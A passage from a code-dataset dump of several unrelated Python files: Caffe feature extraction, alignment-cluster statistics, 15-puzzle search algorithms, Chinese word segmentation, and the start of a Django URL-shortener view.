OrderedDict, net.blobs.\n \n :param model_def: a net.prototxt file path.\n :param model_weights: a .caffemodel file path.\n :return: None.\n \"\"\"\n caffe.set_mode_cpu()\n net = caffe.Net(model_def, model_weights, caffe.TEST)\n # for each layer, show the 
output shape\n for layer_name in net.blobs:\n print(\"{}\\t{}\".format(layer_name, str(net.blobs[layer_name].data.shape)))\n\n\ndef vis_square(data):\n \"\"\"Take an array of shape (n, height, width) or (n, height, width, 3)\n and visualize each (height, width) thing in a grid of size approx. sqrt(n) by sqrt(n)\"\"\"\n # normalize data for display\n data = (data - data.min()) / (data.max() - data.min())\n # force the number of filters to be square\n n = int(np.ceil(np.sqrt(data.shape[0])))\n padding = (((0, n ** 2 - data.shape[0]),\n (0, 1), (0, 1)) # add some space between filters\n + ((0, 0),) * (data.ndim - 3)) # don't pad the last dimension (if there is one)\n data = np.pad(data, padding, mode='constant', constant_values=1) # pad with ones (white)\n # tile the filters into an image\n data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))\n data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])\n plt.imshow(data)\n plt.axis('off')\n\n\ndef extract_feature(model_def, model_weights, mean_npy, file_list, feature_npy,\n gpu=0, layer=\"fc7\", batch_size=50):\n \"\"\"Extract features using the Caffe utility.\n \n Refer to http://caffe.berkeleyvision.org/ for Caffe.\n \n :param model_def: a net.prototxt file path.\n :param model_weights: a .caffemodel file path.\n :param mean_npy: a mean.npy file path.\n :param file_list: a .txt file path or an image path list.\n :param feature_npy: a feature.npy file path.\n :param gpu: the gpu device number, defaults to 0.\n :param layer: the CaffeNet layer, optional, defaults to \"fc7\".\n :param batch_size: the batch size.\n :return: None\n \"\"\"\n if isinstance(file_list, str):\n image_list = read_file_list(file_list)\n else:\n image_list = file_list\n if not image_list or not isinstance(image_list, list):\n return\n try:\n if not os.path.isfile(model_def):\n raise TypeError\n except TypeError:\n print(model_def, \"is not a file\")\n return\n try:\n if not os.path.isfile(model_weights):\n raise TypeError\n except TypeError:\n print(model_weights, \"is not a file\")\n return\n try:\n if not os.path.isfile(mean_npy):\n raise TypeError\n except TypeError:\n print(mean_npy, \"is not a file\")\n return\n try:\n if not os.path.basename(feature_npy):\n raise TypeError\n elif os.path.dirname(feature_npy) and not os.path.exists(os.path.dirname(feature_npy)):\n os.makedirs(os.path.dirname(feature_npy))\n except TypeError:\n print(feature_npy, \"is not a filename\")\n return\n # caffe.set_mode_cpu()\n caffe.set_device(gpu) # if we have multiple GPUs, pick one\n caffe.set_mode_gpu()\n net = caffe.Net(model_def, # defines the structure of the model\n model_weights, # contains the trained weights\n caffe.TEST) # use test mode (e.g., don't perform dropout)\n try:\n if layer not in net.blobs:\n raise KeyError\n except KeyError:\n print(\"no layer named\", layer)\n return\n # load the mean ImageNet image (as distributed with Caffe) for subtraction\n mu = np.load(mean_npy)\n mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values\n print(\"mean-subtracted values:\", zip(\"BGR\", mu))\n # create transformer for the input called \"data\"\n transformer = caffe.io.Transformer({net.inputs[0]: net.blobs[net.inputs[0]].data.shape})\n transformer.set_transpose(net.inputs[0], (2, 0, 1)) # move image channels to outermost dimension\n transformer.set_mean(net.inputs[0], mu) # subtract the dataset-mean value in each channel\n transformer.set_raw_scale(net.inputs[0], 255) # rescale from 
[0, 1] to [0, 255]\n transformer.set_channel_swap(net.inputs[0], (2, 1, 0)) # swap channels from RGB to BGR\n # set the size of the input (we can skip this if we're happy\n # with the default; we can also change it later, e.g., for different batch sizes)\n net.blobs[net.inputs[0]].reshape(batch_size, # batch size\n net.blobs[net.inputs[0]].data.shape[1], # 3-channel (BGR) images\n net.blobs[net.inputs[0]].data.shape[2],\n net.blobs[net.inputs[0]].data.shape[3]) # default image size is 227x227\n i = 0\n j = 0\n # output_shape = [0]\n output_shape = [len(image_list)]\n output_shape.extend(net.blobs[layer].data.shape[1:])\n output = np.empty(output_shape, dtype=net.blobs[layer].data.dtype)\n for image_path in image_list:\n if j == batch_size:\n # perform classification\n net.forward()\n feat = net.blobs[layer].data\n # output = np.append(output, feat, axis=0)\n # output = np.concatenate((output, feat), axis=0)\n # output = np.stack((output, feat), axis=0)\n # output = np.vstack((output, feat))\n output[i * batch_size:i * batch_size + j] = feat.copy()\n i += 1\n j = 0\n # if i * batch_size % 1000 == 0:\n # print(\"Extracted features of {} query images for feature blob {}\".format(i * batch_size, layer))\n try:\n image = caffe.io.load_image(image_path)\n transformed_image = transformer.preprocess(net.inputs[0], image)\n except Exception as e_caffe:\n print(\"%s:\" % image_path)\n # print(e_caffe)\n # print(str(e_caffe))\n print(repr(e_caffe))\n # print(e_caffe.message)\n # print(traceback.format_exc())\n # print(sys.exc_info())\n # traceback.print_exc()\n try:\n with open(\"log.txt\", \"a\") as e_log:\n e_log.write(\"%s:\\n\" % image_path)\n traceback.print_exc(file=e_log)\n e_log.flush()\n except Exception as e_log_write:\n print(\"fail to write log.txt\")\n print(\"{}: {}\".format(image_path, repr(e_log_write)))\n try:\n with open(\"name.txt\", \"a\") as e_path:\n e_path.write(\"{}, {}\\n\".format(image_path, i * batch_size + j))\n except Exception as e_path_write:\n print(\"fail to write path.txt\")\n print(\"{}, {}: {}\".format(image_path, i * batch_size + j, repr(e_path_write)))\n else:\n # copy the image data into the memory allocated for the net\n net.blobs[net.inputs[0]].data[j, :, :, :] = transformed_image\n finally:\n j += 1\n if j:\n net.forward()\n feat = net.blobs[layer].data[0:j]\n # output = np.vstack((output, feat))\n output[i * batch_size:i * batch_size + j] = feat.copy()\n # print(\"Extracted features of {} query images for feature blob {}\".format(i * batch_size + j, layer))\n np.save(feature_npy, output)\n # print(\"Successfully extracted the features!\")\n\n\ndef split_list(image_list, wanted_parts=1):\n \"\"\"Split image list.\n\n The number of each split may be not equal.\n\n :param image_list: an image path list.\n :param wanted_parts: the total number of splits.\n :return: a list contains all sublists of the image path list.\n \"\"\"\n length = len(image_list)\n return [image_list[i*length // wanted_parts: (i+1)*length // wanted_parts]\n for i in xrange(wanted_parts)]\n\n\ndef multi_gpu(model_def, model_weights, mean_npy, file_list, prefix, parts,\n layer=\"fc7\", batch_size=50):\n \"\"\"Extract features using multi gpu.\n\n Refer to https://docs.python.org/2/library/multiprocessing.html for multiprocessing.\n\n :param model_def: a net.prototxt file path.\n :param model_weights: a .caffemodel file path.\n :param mean_npy: a mean.npy file path.\n :param file_list: a .txt file path or an image path list.\n :param prefix: the feature.npy file prefix.\n :param parts: the 
total number of used gpu.\n :param layer: the CaffeNet layer, optional, defaults to \"fc7\".\n :param batch_size: the batch size.\n :return: None\n \"\"\"\n if isinstance(file_list, str):\n image_list = read_file_list(file_list)\n else:\n image_list = file_list\n if not file_list:\n return\n blocks = split_list(image_list, parts)\n multiprocessing.freeze_support()\n pool = multiprocessing.Pool()\n for i in xrange(parts):\n feature_npy = prefix + str(i)\n pool.apply_async(extract_feature, args=(model_def, model_weights, mean_npy, blocks[i], feature_npy,\n i, layer, batch_size))\n pool.close()\n pool.join()\n\n\ndef _main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n parser = argparse.ArgumentParser()\n parser.add_argument(\"net_prototxt\")\n parser.add_argument(\"caffemodel\")\n parser.add_argument(\"mean_npy\")\n parser.add_argument(\"file_list\")\n parser.add_argument(\"output_name\")\n parser.add_argument(\"-m\", \"--mode\", nargs=\"?\", const=\"multi\", default=\"single\", choices=[\"single\", \"multi\"])\n parser.add_argument(\"-g\", \"--gpu\", nargs=\"?\", type=int)\n parser.add_argument(\"-l\", \"--layer\", nargs=\"?\", const=\"fc7\", default=\"fc7\")\n parser.add_argument(\"-b\", \"--batch_size\", nargs=\"?\", const=50, default=50, type=int)\n try:\n args = parser.parse_args(argv)\n except argparse.ArgumentError as msg:\n print(repr(msg), file=sys.stderr)\n return 1\n else:\n if args.mode == \"multi\":\n if args.gpu:\n num = args.gpu\n else:\n num = 1\n multi_gpu(args.net_prototxt, args.caffemodel, args.mean_npy, args.file_list, args.output_name,\n num, args.layer, args.batch_size)\n else:\n if args.gpu:\n num = args.gpu\n else:\n num = 0\n extract_feature(args.net_prototxt, args.caffemodel, args.mean_npy, args.file_list, args.output_name,\n num, args.layer, args.batch_size)\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(_main())\n","sub_path":"caffe/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":11978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"537845428","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: bchurche\n\"\"\"\n\nimport os\nimport argparse\nimport subprocess\nimport shlex\nimport pandas as pd\nimport re\n\nparser = argparse.ArgumentParser(description='stats_clusters')\n\nparser.add_argument(\"-paf\", \"--PAFDIR\", action=\"store\", type=str, required=True ,dest=\"PAFDIR\",\n help=\"Path to paf files.\")\nparser.add_argument(\"-c\", \"--carnac\", action=\"store\", type=str, required=True, dest=\"CARNACDIR\",\n help=\"Path to CARNAC files & clusters fasta files\")\nparser.add_argument(\"-tmp\", \"--tmp_output\", action=\"store\", type=str, required=True, dest=\"tmp_output\",\n help=\"Path to tmp output file\")\nparser.add_argument(\"-o\", \"--output\", action=\"store\", type=str, required=True, dest=\"output\",\n help=\"Path to output file\")\n\noptions = parser.parse_args()\n\nPAFDIR = os.path.abspath(options.PAFDIR)\nCARNACDIR = os.path.abspath(options.CARNACDIR)\ntmp_output = os.path.abspath(options.tmp_output)\noutput = os.path.abspath(options.output)\n\nlist_files = [file for file in os.listdir(PAFDIR) if (os.path.isfile(os.path.join(PAFDIR, file))\n and os.path.splitext(file)[1]==\".paf\")]\n\nlist_dir = [dir for dir in os.listdir(CARNACDIR) if (os.path.isdir(os.path.join(CARNACDIR, dir)) and \"clusters\" in dir)]\n\nassert list_files != []\nassert list_dir != []\n\nprint(\"This is list of directories : 
\")\nprint(os.listdir(CARNACDIR))\nprint(list_dir)\n\nos.chdir(PAFDIR)\n\ndico = {\"Names\":[], \"Kmer\":[], \"Window\":[], \"Minimizer\":[], \"Stop chaining\":[], \"Chain skip\":[], \"Nodes\":[],\n \"Edges\":[], \"Clusters\":[], \"Names_clusters\":[]}\n\nfor file in list_files:\n\n filename = os.path.basename(file)\n\n # command = \"cat {0}\".format(os.path.join(PAFDIR,file))\n # args = shlex.split(command)\n # ps = subprocess.Popen(args, stdout=subprocess.PIPE)\n # ps.wait()\n # print(command)\n\n command = \"cut -f '1' {} > {}\".format(file, tmp_output)\n #args = shlex.split(command)\n subprocess.check_call(command, shell=True)\n print(command)\n\n command = \"cut -f '6' {} > {}\".format(file, tmp_output)\n #args = shlex.split(command)\n subprocess.check_call(command, shell=True)\n print(command)\n\n command = \"sort -u {0} | wc -l\".format(tmp_output)\n #args = shlex.split(command)\n number_nodes = int(subprocess.check_output(command, shell = True))\n #number_nodes = subprocess.check_output(shlex.split(\"wc -l\"))\n number_edges = int(subprocess.check_output(shlex.split(\"wc -l {0}\".format(file))).decode().split(' ')[0])\n print(\"This is number of nodes : {0}\".format(number_nodes))\n print(\"This is number of edges : {0}\".format(number_edges))\n\n try:\n kmer = re.search('k(.+?)w', file).group(1)\n except AttributeError:\n kmer = ''\n try:\n window = re.search('w(.+?)m', file).group(1)\n except AttributeError:\n window = ''\n try:\n minimizer = re.search('m(.+?)g', file).group(1)\n except AttributeError:\n minimizer = ''\n try:\n stop_chain = re.search('g(.+?)skip', file).group(1)\n except AttributeError:\n stop_chain = ''\n try:\n chain_skip = re.search('skip(.+?).paf', file).group(1)\n except AttributeError:\n chain_skip = ''\n\n dico[\"Names\"].append(filename)\n dico[\"Nodes\"].append(number_nodes)\n dico[\"Edges\"].append(number_edges)\n dico[\"Kmer\"].append(kmer)\n dico[\"Window\"].append(window)\n dico[\"Minimizer\"].append(minimizer)\n dico[\"Stop chaining\"].append(stop_chain)\n dico[\"Chain skip\"].append(chain_skip)\n\n os.remove(tmp_output)\n\nos.chdir(CARNACDIR)\n\nfor dir in list_dir:\n\n ps = subprocess.Popen((\"ls\",dir), stdout=subprocess.PIPE)\n ps.wait()\n number_clusters = int(subprocess.check_output((\"wc\",\"-l\"), stdin=ps.stdout))\n dico[\"Names_clusters\"].append(dir)\n dico[\"Clusters\"].append(number_clusters)\n\nprint(dico)\n\ndf = pd.DataFrame.from_dict(dico)\ndf = df[[\"Names\", \"Kmer\", \"Window\", \"Minimizer\", \"Stop chaining\", \"Chain skip\", \"Nodes\", \"Edges\", \"Clusters\",\n \"Names_clusters\"]]\n\nwith open(output, \"w\") as f:\n df.to_csv(f, sep='\\t', encoding='utf-8')\n\nprint(df)\n","sub_path":"scripts/stats_clusters.py","file_name":"stats_clusters.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345753572","text":"import time\r\nimport numpy as np\r\nimport sys\r\nimport copy\r\nsys.path.insert(0, \"aipython\")\r\nfrom aipython.searchGeneric import *\r\nfrom aipython.searchProblem import *\r\nfrom aipython.cspProblem import *\r\nfrom aipython.cspSearch import *\r\nfrom T1 import *\r\n\r\nclass BreadthFirstSearcher(Searcher):\r\n\r\n def __init__(self, problem):\r\n super().__init__(problem)\r\n\r\n \"\"\" Initializes the forontier \"\"\"\r\n\r\n def initialize_frontier(self):\r\n self.frontier_ = []\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n\r\n def empty_frontier(self):\r\n return len(self.frontier_) 
+{"seq_id":"345753572","text":"import time\r\nimport numpy as np\r\nimport sys\r\nimport copy\r\nsys.path.insert(0, \"aipython\")\r\nfrom aipython.searchGeneric import *\r\nfrom aipython.searchProblem import *\r\nfrom aipython.cspProblem import *\r\nfrom aipython.cspSearch import *\r\nfrom T1 import *\r\n\r\nclass BreadthFirstSearcher(Searcher):\r\n\r\n def __init__(self, problem):\r\n super().__init__(problem)\r\n\r\n \"\"\" Initializes the frontier \"\"\"\r\n\r\n def initialize_frontier(self):\r\n self.frontier_ = []\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n\r\n def empty_frontier(self):\r\n return len(self.frontier_) == 0\r\n\r\n \"\"\" Adds the path to the frontier \"\"\"\r\n\r\n def add_to_frontier(self, path):\r\n self.frontier_.append(path)\r\n\r\n \"\"\"returns (next) path from the problem's start node\r\n to a goal node. \"\"\"\r\n\r\n def search(self):\r\n \"\"\"returns (next) path from the problem's start node\r\n to a goal node.\r\n Returns None if no path exists.\r\n \"\"\"\r\n visited = set()\r\n start_t = time.time()\r\n\r\n while not self.empty_frontier():\r\n if len(self.frontier_) >= 1000000:\r\n print(\"Mem\")\r\n return None\r\n\r\n if time.time() - start_t > 300:\r\n print(\"Time\")\r\n return None\r\n\r\n path = self.frontier_.pop(0)\r\n\r\n self.num_expanded += 1\r\n\r\n sign = tuple(tuple(i) for i in path.end())\r\n if sign in visited:\r\n continue\r\n visited.add(sign)\r\n\r\n if self.problem.is_goal(path.end()): # solution found\r\n print(\"Expanded {}, Remained: {}\".format(self.num_expanded, len(self.frontier_)))\r\n self.solution = path # store the solution found\r\n return path\r\n else:\r\n neighs = self.problem.neighbors(path.end())\r\n for arc in reversed(list(neighs)):\r\n # renamed from 'np' to avoid shadowing the numpy alias\r\n new_path = Path(path, arc)\r\n sign = tuple(tuple(i) for i in new_path.end())\r\n if sign not in visited:\r\n self.add_to_frontier(new_path)\r\n\r\n print(\"No more solutions; expanded {}\".format(self.num_expanded))\r\n return None\r\n\r\n\r\ndef test_s(searcher, title):\r\n print(\"-\" * 60 + \"\\n\" + title)\r\n\r\n solution = searcher.search()\r\n if solution is not None:\r\n print(\"Cost: {}\".format(solution.cost))\r\n\r\n\r\nGFP = GameFifteenProblem\r\nstart1 = [[1, 2, 3, 4],\r\n [5, 6, 7, 8],\r\n [9, 10, 11, 12],\r\n [13, 14, 0, 15]]\r\n\r\n# optimal path cost: 10\r\nstart10 = [[2, 3, 7, 4],\r\n [1, 6, 11, 8],\r\n [5, 10, 0, 12],\r\n [9, 13, 14, 15]]\r\n\r\ntest_s(BreadthFirstSearcher(GFP(start1, goal)), \"start1 BFS\")\r\ntest_s(BreadthFirstSearcher(GFP(start10, goal)), \"start10 BFS\")\r\n\r\n\r\nclass IterativeDeepeningSearcher(Searcher):\r\n def __init__(self, problem):\r\n super().__init__(problem)\r\n\r\n self.visited_ = None\r\n self.start_t_ = None\r\n self.path_ = None\r\n\r\n \"\"\" Initializes the frontier \"\"\"\r\n\r\n def initialize_frontier(self):\r\n self.frontier_ = []\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n\r\n def empty_frontier(self):\r\n return len(self.frontier_) == 0\r\n\r\n \"\"\" Adds the path to the frontier \"\"\"\r\n\r\n def add_to_frontier(self, path):\r\n self.frontier_.append(path)\r\n\r\n def search(self):\r\n self.start_t_ = time.time()\r\n self.path_ = self.frontier_.pop(0)\r\n\r\n for limit in range(1, 1000000):\r\n self.visited_ = set()\r\n\r\n ret = self.dfs_(0, limit)\r\n\r\n if ret is not None:\r\n print(\"Expanded {}, Remained: {}\".format(self.num_expanded, len(self.frontier_)))\r\n self.solution = ret\r\n return ret\r\n\r\n if time.time() - self.start_t_ > 300:\r\n print(\"Time\")\r\n return None\r\n\r\n # exceed 1000000 memory limit\r\n print(\"Mem\")\r\n return None\r\n\r\n def dfs_(self, depth, limit):\r\n if self.problem.is_goal(self.path_.end()):\r\n print(\"Found solution\")\r\n return self.path_\r\n\r\n if depth >= limit:\r\n return None\r\n\r\n sign = (tuple(tuple(i) for i in self.path_.end()), depth)\r\n if sign in self.visited_:\r\n return None\r\n self.visited_.add(sign)\r\n\r\n self.num_expanded += 1\r\n\r\n neighs = self.problem.neighbors(self.path_.end())\r\n for arc in list(neighs):\r\n tmp = self.path_\r\n\r\n # add new node\r\n self.path_ = Path(self.path_, arc)\r\n ret = self.dfs_(depth + 1, limit)\r\n\r\n # find 
solution\r\n if ret is not None:\r\n return ret\r\n\r\n if time.time() - self.start_t_ > 300:\r\n return None\r\n\r\n # backtracking to previous path\r\n self.path_ = tmp\r\n\r\n return None\r\n\r\n\r\ndef test_s(searcher, title):\r\n print(\"-\" * 60 + \"\\n\" + title)\r\n\r\n solution = searcher.search()\r\n if solution is not None:\r\n print(\"Cost: {}\".format(solution.cost))\r\n print(solution)\r\n\r\n\r\nGFP = GameFifteenProblem\r\nstart1 = [[1, 2, 3, 4],\r\n [5, 6, 7, 8],\r\n [9, 10, 11, 12],\r\n [13, 14, 0, 15]]\r\n\r\n# optimal path cost: 10\r\nstart10 = [[2, 3, 7, 4],\r\n [1, 6, 11, 8],\r\n [5, 10, 0, 12],\r\n [9, 13, 14, 15]]\r\n\r\n# optimal path cost: 24\r\nstart24 = [[2, 7, 11, 4],\r\n [6, 3, 12, 0],\r\n [1, 5, 15, 8],\r\n [9, 10, 13, 14]]\r\n\r\ntest_s(IterativeDeepeningSearcher(GFP(start1, goal)), \"start1 IDS\")\r\ntest_s(IterativeDeepeningSearcher(GFP(start10, goal)), \"start10 IDS\")\r\ntest_s(IterativeDeepeningSearcher(GFP(start24, goal)), \"start24 IDS\")\r\n\r\n\r\nclass IterativeDeepeningAStarSearcher(Searcher):\r\n def __init__(self, problem):\r\n super().__init__(problem)\r\n\r\n self.visited_ = None\r\n self.start_t_ = None\r\n self.path_ = None\r\n self.node_generate_ = None\r\n\r\n \"\"\" Initializes the forontier \"\"\"\r\n\r\n def initialize_frontier(self):\r\n self.frontier_ = []\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n\r\n def empty_frontier(self):\r\n return len(self.frontier_) == 0\r\n\r\n \"\"\" Adds the path to the forontier \"\"\"\r\n\r\n def add_to_frontier(self, path):\r\n self.frontier_.append(path)\r\n\r\n def search(self):\r\n self.start_t_ = time.time()\r\n self.path_ = self.frontier_.pop(0)\r\n self.node_generate_ = 0\r\n\r\n for limit in range(1, 100, 2):\r\n self.visited_ = set()\r\n ret = self.dfs_(limit)\r\n\r\n if ret is not None:\r\n print(\"Expanded {}, Generated: {}\".format(self.num_expanded, self.node_generate_))\r\n self.solution = ret\r\n return ret\r\n\r\n if time.time() - self.start_t_ > 300:\r\n print(\"Expanded: {}, Status: {}\".format(self.num_expanded, \"Time\"))\r\n return None\r\n\r\n # exceed 1000000 memory limit\r\n print(\"Mem\")\r\n return None\r\n\r\n def dfs_(self, limit):\r\n if self.problem.is_goal(self.path_.end()):\r\n print(\"Found solution\")\r\n return self.path_\r\n\r\n self.num_expanded += 1\r\n\r\n neighs = self.problem.neighbors(self.path_.end())\r\n q = FrontierPQ()\r\n for arc in list(neighs):\r\n path = Path(self.path_, arc)\r\n value = path.cost + self.problem.heuristic(path.end())\r\n\r\n if value <= limit:\r\n q.add(path, value)\r\n self.node_generate_ += 1\r\n\r\n while not q.empty():\r\n tmp = self.path_\r\n self.path_ = q.pop()\r\n\r\n ret = self.dfs_(limit)\r\n\r\n # find solution\r\n if ret is not None:\r\n return ret\r\n\r\n if time.time() - self.start_t_ > 300:\r\n return None\r\n\r\n # backtracking to previous path\r\n self.path_ = tmp\r\n\r\n return None\r\n\r\n\r\ndef test_s(searcher, title):\r\n print(\"-\" * 60 + \"\\n\" + title)\r\n\r\n solution = searcher.search()\r\n if solution is not None:\r\n print(\"Cost: {}\".format(solution.cost))\r\n print(solution)\r\n\r\n\r\nGFP = GameFifteenProblem\r\nstart1 = [[1, 2, 3, 4],\r\n [5, 6, 7, 8],\r\n [9, 10, 11, 12],\r\n [13, 14, 0, 15]]\r\n\r\n# optimal path cost: 10\r\nstart10 = [[2, 3, 7, 4],\r\n [1, 6, 11, 8],\r\n [5, 10, 0, 12],\r\n [9, 13, 14, 15]]\r\n\r\n# optimal path cost: 24\r\nstart24 = [[2, 7, 11, 4],\r\n [6, 3, 12, 0],\r\n [1, 5, 15, 8],\r\n [9, 10, 13, 
14]]\r\n\r\nprint(test_s(IterativeDeepeningAStarSearcher(GFP(start1, goal)), \"start1 IDSA*\"))\r\ntest_s(IterativeDeepeningAStarSearcher(GFP(start10, goal)), \"start10 IDSA*\")\r\ntest_s(IterativeDeepeningAStarSearcher(GFP(start24, goal)), \"start24 IDSA*\")\r\n\r\nclass UniformCostSearcher(Searcher):\r\n \"\"\" Initializes the forontier \"\"\"\r\n def initialize_frontier(self):\r\n self.frontier = FrontierPQ()\r\n\r\n \"\"\" Returns True if there are no more nodes to expand \"\"\"\r\n def empty_frontier(self):\r\n return self.frontier.empty()\r\n\r\n \"\"\" Adds the path to the forontier \"\"\"\r\n def add_to_frontier(self, path):\r\n self.frontier.add(path, path.cost)\r\n if len(self.frontier) > 1000000:\r\n print(\"Mem\")\r\n raise\r\n\r\n\r\n# optimal path cost: 10\r\nstart10 = [[2, 3, 7, 4],\r\n [1, 6, 11, 8],\r\n [5, 10, 0, 12],\r\n [9, 13, 14, 15]]\r\n\r\n# optimal path cost: 24\r\nstart24 = [[2, 7, 11, 4],\r\n [6, 3, 12, 0],\r\n [1, 5, 15, 8],\r\n [9, 10, 13, 14]]\r\n\r\n# optimal path cost: 30\r\nstart30 = [[2, 7, 11, 4],\r\n [6, 3, 12, 0],\r\n [1, 5, 15, 14],\r\n [9, 10, 8, 13]]\r\n\r\n# optimal path cost: 36\r\nstart36 = [[7, 11, 12, 4],\r\n [2, 3, 14, 1],\r\n [6, 5, 13, 8],\r\n [9, 10, 15, 0]]\r\n\r\n# optimal path cost: 41\r\nstart41 = [[7, 11, 12, 4],\r\n [2, 3, 8, 14],\r\n [10, 0, 5, 1],\r\n [6, 9, 13, 15]]\r\n\r\n\r\ndef test_s(searcher, title):\r\n print(\"-\" * 60 + \"\\n\" + title)\r\n solution = searcher.search()\r\n if solution is not None:\r\n print(\"[{}] cost: {}\".format(title, solution.cost))\r\n\r\n\r\nGFP = GameFifteenProblem\r\n\r\n# your code\r\ntry:\r\n test_s(BreadthFirstSearcher(GFP(start10, goal)), \"start10 BFS\")\r\n test_s(BreadthFirstSearcher(GFP(start24, goal)), \"start24 BFS\")\r\n test_s(BreadthFirstSearcher(GFP(start30, goal)), \"start30 BFS\")\r\n test_s(BreadthFirstSearcher(GFP(start36, goal)), \"start36 BFS\")\r\n test_s(BreadthFirstSearcher(GFP(start41, goal)), \"start41 BFS\")\r\nexcept:\r\n print(\"Continue to next algorithm\")\r\n\r\ntry:\r\n test_s(IterativeDeepeningSearcher(GFP(start10, goal)), \"start10 IDS\")\r\n test_s(IterativeDeepeningSearcher(GFP(start24, goal)), \"start24 IDS\")\r\n test_s(IterativeDeepeningSearcher(GFP(start30, goal)), \"start30 IDS\")\r\n test_s(IterativeDeepeningSearcher(GFP(start36, goal)), \"start36 IDS\")\r\n test_s(IterativeDeepeningSearcher(GFP(start41, goal)), \"start41 IDS\")\r\nexcept:\r\n print(\"Continue to next algorithm\")\r\n\r\ntry:\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start10, goal)), \"start10 IDA*\")\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start24, goal)), \"start24 IDA*\")\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start30, goal)), \"start30 IDA*\")\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start36, goal)), \"start36 IDA*\")\r\n test_s(IterativeDeepeningAStarSearcher(GFP(start41, goal)), \"start41 IDA*\")\r\nexcept:\r\n print(\"Continue to next algorithm\")\r\n\r\ntry:\r\n test_s(UniformCostSearcher(GFP(start10, goal)), \"start10 UCS\")\r\n test_s(UniformCostSearcher(GFP(start24, goal)), \"start24 UCS\")\r\n test_s(UniformCostSearcher(GFP(start30, goal)), \"start30 UCS\")\r\n test_s(UniformCostSearcher(GFP(start36, goal)), \"start36 UCS\")\r\n test_s(UniformCostSearcher(GFP(start41, goal)), \"start41 UCS\")\r\nexcept:\r\n print(\"Continue to next algorithm\")\r\n\r\ntry:\r\n test_s(AStarSearcher(GFP(start10, goal)), \"start10 A*\")\r\n test_s(AStarSearcher(GFP(start24, goal)), \"start24 A*\")\r\n test_s(AStarSearcher(GFP(start30, goal)), \"start30 A*\")\r\n 
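    # (Illustrative aside with assumed, rough numbers; not from the original
    # assignment.) Why the blind searches above trip the memory caps while the
    # depth-first variants do not: a breadth-first frontier grows roughly as
    # b**d for branching factor b and optimal solution depth d. With b ~ 3 on
    # the 15-puzzle:
    #     3 ** 10 = 59,049 paths   -> start10 fits under the 1,000,000-path cap
    #     3 ** 30 ~ 2.1e14 paths   -> start30 and deeper hit the "Mem" guard
    # IDS/IDA* instead keep only the current path, i.e. O(d) memory.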
test_s(AStarSearcher(GFP(start36, goal)), \"start36 A*\")\r\n test_s(AStarSearcher(GFP(start41, goal)), \"start41 A*\")\r\nexcept:\r\n print(\"Done\")\r\n\r\nprint('Task2 Done')","sub_path":"9814Ass1/T2.py","file_name":"T2.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"514086946","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\n@Time : 2019-01-07 08:57\n@Author : red\n@Site : \n@File : seg_word.py\n@Software: PyCharm\n\"\"\"\nimport jieba_fast as jieba\nimport configparser as cf\nimport codecs\nfrom utils import file_util\nimport re\n\n# 开启并行分词模式,参数为并行进程数\njieba.enable_parallel(4)\n\n\ndef get_file_path(section, key):\n conf = cf.ConfigParser()\n conf.read('../conf/config.cfg')\n return conf.get(section, key)\n\n\ndef get_stop_word():\n with codecs.open(get_file_path('stop_file', 'stop_words_chinese_1'), 'r', encoding='utf8') as f1:\n data1 = f1.read()\n\n with codecs.open(get_file_path('stop_file', 'stop_words_english_1'), 'r') as f2:\n data2 = f2.read()\n f_stop_list = (data1 + data2).split('\\n')\n return f_stop_list\n\n\ndef write_file(file_path, content):\n with codecs.open(file_path, 'w', encoding='utf8') as w:\n w.write(u\" \".join(content))\n\n\ndef split(stop_lists, data):\n word_list = []\n seg_list = jieba.cut(data, cut_all=False)\n list_str = \" \".join(seg_list)\n\n for word in list_str.split(\" \"):\n if not (word.strip().lower() in stop_lists) \\\n and len(word.strip()) > 1 \\\n and not word.isdigit() \\\n and not re.search('[a-zA-Z]', word) \\\n and '\\u4e00' <= word <= '\\u9fff':\n word_list.append(word)\n for element in word_list:\n file_util.append_file(\"/Users/red/Desktop/temp/news/data/sj_data/all_data/all_seg_word_data.txt\", element + \" \")\n\n\ndef get_content():\n return file_util.read_file(\"/Users/red/Desktop/temp/news/data/sj_data/all_data/article_txt.txt\")\n\n\nif __name__ == '__main__':\n stop_word_list = get_stop_word()\n split(stop_word_list, str(get_content()))\n","sub_path":"seg_word/seg_all_data.py","file_name":"seg_all_data.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84785543","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse,HttpResponsePermanentRedirect\nfrom .forms import UrlForm\nfrom .models import url\n\nimport string\nimport random\n\ndef short_random_string(n):\n\n return ''.join(random.SystemRandom().choice(\n string.ascii_uppercase + \\\n string.ascii_lowercase + \\\n string.digits) for _ in range(n))\n\ndef index(request):\n if request.method == 'POST':\n \n form = UrlForm(request.POST)\n \n if form.is_valid():\n val={'url': form.cleaned_data['url']}\n hash_ = form.cleaned_data['hash_']\n if hash_:\n if url.objects.filter(custom=hash_).exists():\n return render(request, 'index.html',{'error':\"Provided hash value is already taken\",'form':form})\n else:\n val.update({'custom':hash_})\n else:\n hash_=short_random_string(5)\n 